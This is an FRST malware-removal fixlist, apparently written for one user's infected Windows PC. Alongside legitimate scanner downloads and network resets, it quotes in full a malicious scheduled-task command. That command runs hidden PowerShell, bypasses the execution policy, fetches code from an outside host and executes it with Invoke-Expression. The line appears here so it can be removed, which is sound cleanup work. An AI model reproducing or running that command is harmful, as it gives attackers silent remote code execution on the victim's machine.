Start::
CreateRestorePoint:
CloseProcesses:
2026-04-26 12:36 - 2026-04-26 12:36 - 000002666 _____ C:\WINDOWS\system32\Tasks\Media Player Service
2026-04-24 20:48 - 2026-04-24 20:48 - 000000000 ____D C:\Users\Conway\AppData\Local\Yandex
2026-04-24 14:17 - 2026-04-24 14:17 - 000000000 ____D C:\Users\Conway\AppData\Roaming\RenPy
CustomCLSID: HKU\S-1-5-21-2392716304-2438942924-2019435442-1001_Classes\CLSID\{2cd17d3d-8f37-6dad-c814-c56850a6de24}\localserver32 -> "C:\ProgramData\Lenovo\Udc\Hosts\24.9.1.3\x64\MessagingPlugin.exe" -ToastActivated => No File
CustomCLSID: HKU\S-1-5-21-2392716304-2438942924-2019435442-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32 -> => No File
ShellIconOverlayIdentifiers: [ LenovoAINowOverlayIcon] -> {4B48C68B-80D6-40FB-B4D1-63C19130EC75} => C:\Program Files\Lenovo\Lenovo AI Now\OverlayIcon.dll -> No File
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [5126]
FirewallRules: [{A3A6CF0B-652E-4673-9278-F900EC1F0E5C}] => (Block) C:\Program Files (x86)\Overwolf\0.296.0.23\OverwolfBrowser.exe => No File
FirewallRules: [{24391D85-9341-41B2-B5BA-64C984F35E63}] => (Block) C:\Program Files (x86)\Overwolf\0.296.0.23\OverwolfBrowser.exe => No File
FirewallRules: [{1FF38ED5-0FBA-4409-9F7F-347F9CCCF0F0}] => (Allow) C:\Program Files (x86)\Overwolf\0.296.0.23\OverwolfBrowser.exe => No File
FirewallRules: [{182AB96C-4144-450A-80F4-CDF8C79D02FE}] => (Allow) C:\Program Files (x86)\Overwolf\0.296.0.23\OverwolfBrowser.exe => No File
FirewallRules: [{FE1C7F79-BA32-4B92-AE3B-0C82C657C1D0}] => (Allow) C:\Users\Conway\AppData\Roaming\Hytale\install\pre-release\package\jre\latest\bin\java.exe => No File
FirewallRules: [{F182B7F7-B726-4041-B916-A2882402B6A4}] => (Allow) C:\Users\Conway\AppData\Roaming\Hytale\install\pre-release\package\jre\latest\bin\java.exe => No File
FirewallRules: [{A27B6FA2-2AF4-4504-8279-6C96820EDE88}] => (Allow) C:\Users\Conway\AppData\Roaming\Hytale\install\pre-release\package\game\latest\Client\HytaleClient.exe => No File
FirewallRules: [{1163C493-867B-41E7-9249-C24A4F099982}] => (Allow) C:\Users\Conway\AppData\Roaming\Hytale\install\pre-release\package\game\latest\Client\HytaleClient.exe => No File
FirewallRules: [{C5745137-7E0D-4CEF-8271-2C573305A9C1}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{8AA5CCCE-112A-4793-9788-3E2838F47EED}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
2026-04-26 13:31 - 2025-10-11 11:47 - 000027949 _____ C:\Users\Conway\AppData\LocalLow\d50a4a167fb17467045ea40b8ca1a54a5af4c92056318410bcccd799a412aa87
2026-01-19 15:21 - 2026-01-19 15:21 - 000000048 ____R () C:\Users\Conway\AppData\Local\0119AC2FC90D95AC063B177717B7B3B6
2025-09-17 23:21 - 2025-09-17 23:21 - 000000048 ____R () C:\Users\Conway\AppData\Local\DB0A5245D71083BAF12FBD1A6E871F38
HKLM\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
Task: {9EE24C95-B1C8-48B9-BF8F-A6F14761E312} - System32\Tasks\Google Compatibility Appraiser CL_NCL_8a3caad3254b3327 => C:\WINDOWS\system32\conhost.exe [1003520 2026-04-26] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
Task: {E950E225-EF24-4EF8-8C80-D6E37A4D1879} - System32\Tasks\Media Player Service => C:\Users\Conway\rr.exe\MediaPlayerService.exe (No File) <==== ATTENTION
2026-04-26 12:36 - 2026-04-26 12:36 - 000003592 _____ C:\WINDOWS\system32\Tasks\Google Compatibility Appraiser CL_NCL_8a3caad3254b3327
2026-04-24 14:17 - 2026-04-24 14:17 - 000000000 ____D C:\Users\Conway\AppData\Roaming\ConnectorDbg_i686
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from Emsisoft's official site, updates it, and scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUPs in (1) system memory and (2) important folders, as the documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
# Create the working folders if they do not exist yet.
if (-not (Test-Path $frstPath)) {
    New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
    New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
# Pick the scanner binary that matches the OS architecture.
if ([Environment]::Is64BitOperatingSystem) {
    $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
    $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
# Download the kit and unpack it into $extractPath.
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
# Wait for the scanner binary that will actually be run, then stop the extractor.
while (-not (Test-Path $a2cmdPath)) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
# Update the scanner, run the quick scan, and print the scan log.
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
StartPowerShell:
# Downloads the newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log to the console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add the /preinstalled argument alongside the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*
EmptyTemp:
End::
Warning
Executing a Fixlist on the wrong system may permanently damage it. Continue only if this link was meant for you.